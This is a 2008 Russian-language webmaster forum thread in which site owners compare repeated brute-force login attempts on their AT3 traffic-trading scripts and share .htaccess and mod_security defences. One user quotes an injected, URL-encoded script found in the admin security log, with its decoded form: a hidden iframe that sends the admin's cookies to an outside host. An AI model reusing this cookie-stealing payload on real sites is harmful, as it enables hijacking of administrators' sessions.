С нами с 28.10.05
Сообщения: 179
Рейтинг: 118
|
 Добавлено: 07/03/08 в 21:36 |
У кого-нить были?
203.117.111.106 tried to login with user / pass.
на всех рабочих сиджах сегодня 2 раза пытался, пока безуспешно....
Последний раз редактировалось: penelo (08/03/08 в 01:13), всего редактировалось 1 раз
|
|
|
|
Если где-то нет кого-то, значит кто-то где-то есть...
|
0
|
|
| |
С нами с 30.11.03
Сообщения: 135
Рейтинг: 102
|
| Добавлено: 07/03/08 в 21:59 |
Есть такое
12:32 - 05 Mar 203.117.111.106 tried to login with user / pass.
12:21 - 05 Mar 203.117.111.106 tried to login with user / pass.
У меня еще в феврале этот 4 раза пытался
23:51 - 20 Feb 195.5.116.250 tried to login with user / pass.
13:48 - 19 Feb 195.5.116.250 tried to login with user / pass.
|
|
|
|
| |
С нами с 28.10.05
Сообщения: 179
Рейтинг: 118
|
| Добавлено: 07/03/08 в 23:17 |
У меня с этого 195.5.116.250 только 1 раз на 1 сидже, радует только то что пока безуспешно....
|
|
|
|
Если где-то нет кого-то, значит кто-то где-то есть...
|
0
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 07/03/08 в 23:23 |
У меня этот адрес в фаерволе прописан 195.5.116.250 С него постояннно попытки взлома шли.
|
|
|
|
| |
С нами с 28.10.05
Сообщения: 179
Рейтинг: 118
|
| Добавлено: 07/03/08 в 23:58 |
Как они зае#али... 
|
|
|
|
Если где-то нет кого-то, значит кто-то где-то есть...
|
0
|
|
| |
Тыц
С нами с 23.10.06
Сообщения: 692
Рейтинг: 411
|
| Добавлено: 08/03/08 в 18:58 |
|
|
|
|
| |
С нами с 25.09.04
Сообщения: 485
Рейтинг: 514
|
| Добавлено: 10/03/08 в 11:49 |
та же херня на сиджах
06:28 - 05 Mar 203.117.111.106 tried to login with user / pass.
06:04 - 05 Mar 203.117.111.106 tried to login with user / pass.
19:16 - 08 Mar 203.117.111.106 tried to login with user / pass.
19:01 - 08 Mar 203.117.111.106 tried to login with user / pass.
дык, еще что интересно доступ к admin.cgi закрыт не для моих ip-ов... есть у кого-то по этому поводу мысли?
|
|
|
|
| |
С нами с 18.08.04
Сообщения: 6376
Рейтинг: 4430
|
| Добавлено: 10/03/08 в 11:56 |
SOCKS Троян на твоей машине
|
|
|
|
| |
С нами с 28.10.05
Сообщения: 179
Рейтинг: 118
|
| Добавлено: 10/03/08 в 12:28 |
NeXt: у меня все открыто было, только позавчера доступ к x2 позакрывал...
dDan: А нельзя ли по-подробнее?
|
|
|
|
Если где-то нет кого-то, значит кто-то где-то есть...
|
0
|
|
| |
С нами с 25.09.04
Сообщения: 485
Рейтинг: 514
|
| Добавлено: 10/03/08 в 13:46 |
так и у меня все что можно закрыто было формы, х2, admin (htaccesом), один хуй в админку пытались зайти...
|
|
|
|
| |
Денежных дел мастер
С нами с 03.10.04
Сообщения: 2573
Рейтинг: 1436
|
| Добавлено: 10/03/08 в 13:52 |
| dDan писал: | | SOCKS Троян на твоей машине |
Не троян это, а бот гуляет по сиджам и простукивает, бот того идиота, кто сиджы последнее время ломает на ат3
|
|
|
|
| |
С нами с 28.10.05
Сообщения: 179
Рейтинг: 118
|
| Добавлено: 10/03/08 в 13:54 |
INTELigent: Фуф, успокоил, а я решил уже антивирус менять...
|
|
|
|
Если где-то нет кого-то, значит кто-то где-то есть...
|
0
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 11/03/08 в 10:21 |
Аналогично:
19:49 - 24 Feb 195.5.116.250 tried to login with user / pass.
06:33 - 05 Mar 203.117.111.106 tried to login with user / pass.
06:24 - 05 Mar 203.117.111.106 tried to login with user / pass.
05:48 - 05 Mar 203.117.111.106 tried to login with user / pass.
19:20 - 08 Mar 203.117.111.106 tried to login with user / pass.
19:12 - 08 Mar 203.117.111.106 tried to login with user / pass.
Упорный сцуко мудило... 
|
|
|
|
| |
С нами с 25.09.04
Сообщения: 485
Рейтинг: 514
|
| Добавлено: 11/03/08 в 12:25 |
Ахтунг!!
У кого были попытки залогинится проверьте в админке хтмл код страницы c security log на наличие такой зашифрованой гадости | Код: | <script>document.write(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%32%20%68%65%69%67%68%74%3D%32%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%75%6E%69%73%74%61%66%66%2E%72%75%2F%6A%73%2F%73%61%76%65%72%2E%70%68%74%6D%6C%3F%6C%6F%67%69%6E%3D%.........')+document.cookie+unescape('%22%3E%3C%2F%69%66%72%61%6D%65%3E'))</script>
|
вот расшифрованый вид
| Код: | | <iframe width=2 height=2 style="display:none" src="http://www .unistaff.ru/js/saver.phtml?login=http://my_cj.com/cgi-bin/at3/in.cgi=&#')+document.cookie+unescape('"></iframe> |
в общем такая вот хрень грузится в ифрейме в админке... я в программинге не силен.. кто знает дайте коменты!
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 11/03/08 в 12:45 |
| NeXt писал: | Ахтунг!!
У кого были попытки залогинится проверьте в админке хтмл код страницы c security log на наличие такой зашифрованой гадости | Код: | <script>document.write(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%32%20%68%65%69%67%68%74%3D%32%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%75%6E%69%73%74%61%66%66%2E%72%75%2F%6A%73%2F%73%61%76%65%72%2E%70%68%74%6D%6C%3F%6C%6F%67%69%6E%3D%.........')+document.cookie+unescape('%22%3E%3C%2F%69%66%72%61%6D%65%3E'))</script>
|
вот расшифрованый вид
| Код: | | <iframe width=2 height=2 style="display:none" src="http://www .unistaff.ru/js/saver.phtml?login=http://my_cj.com/cgi-bin/at3/in.cgi=&#')+document.cookie+unescape('"></iframe> |
в общем такая вот хрень грузится в ифрейме в админке... я в программинге не силен.. кто знает дайте коменты! |
Подтверждаю!!! Спасибо NeXt что подсказал!!!
Была аналогичная шляпа!
|
|
|
|
| |
С нами с 28.01.06
Сообщения: 380
Рейтинг: 588
|
| Добавлено: 11/03/08 в 13:22 |
как это удалить нах??
и как сделать чтобы небыло этого?
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 11/03/08 в 13:33 |
Удалить - просто почистить логи...
А вот как сделать чтобы небыло... - вот тут х.з...
Если уж и хтакцессом закрывали и еще что-то...
И все-равно этот мудила проникает в админку...
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 11/03/08 в 14:04 |
Там какойто хитрый запрос идет к кукам обращается. Походу он проканывает если кто то в админке золгенен. Там по любому не просто так хотел в админку под user/pass попасть. Мне mod_security для апач помог.
Могу лог mod_security с его запросом показать комунибуть из местных программеров.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 11/03/08 в 14:26 |
скинь плс логу
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 11/03/08 в 15:59 |
то что вы прикрываете сам скрипт admin.cgi - абсолютно по барабану, т.к. можно авторизоваться через login.cgi передав ему необходимые параметры(user=USER&pass=PASS методом POST), и преспокойно редактировать статсы/параметры/и т.д./и т.п. через все остальные скрипты (x2.cgi, rХ.cgi, и т.д.) точно также передавая необходимые параметры.
так что нужно параллельно прикрывать login.cgi дополнительно типа так:
<Files login.cgi>
order deny,allow
deny from all
allow from IP
</Files>
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 11/03/08 в 16:49 |
Дружище, подскажи как можно разрешить доступ к файлу по маске IP? Т.к. IP динамический, нельзя доступ разрешить одному определенному IP... 
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 11/03/08 в 16:55 |
поправлюсь пока никто не заметил:
<FilesMatch "(admin|x2|login)\.cgi">
Order Deny,Allow
Deny from All
Allow from IP
</FilesMatch>
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 11/03/08 в 16:59 |
| Цитата: | | Дружище, подскажи как можно разрешить доступ к файлу по маске IP? Т.к. IP динамический, нельзя доступ разрешить одному определенному IP...icon_sad.gif |
лучше всего через DynDNS прописать себе хоть какое-то доменное имя, и его добавить в хтаксес
а иначе:
<FilesMatch "(admin|x2|login)\.cgi">
Order Deny,Allow
Deny from All
Allow from NET/MASK (например 195.5.6.0/24)
</FilesMatch>
|
|
|
|
| |
С нами с 25.09.04
Сообщения: 485
Рейтинг: 514
|
| Добавлено: 11/03/08 в 17:03 |
x2 и login так не закроешь одним файлом, они в другой папке лежат в отличие от admin, ну и наоборот ))
+1 тоже интересно как разрешить доступ только по маске, например 172.16.*.*.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 11/03/08 в 17:09 |
| Цитата: | | x2 и login так не закроешь одним файлом, они в другой папке лежат в отличие от admin, ну и наоборот )) |
всё нормально закроешь
|
|
|
|
| |
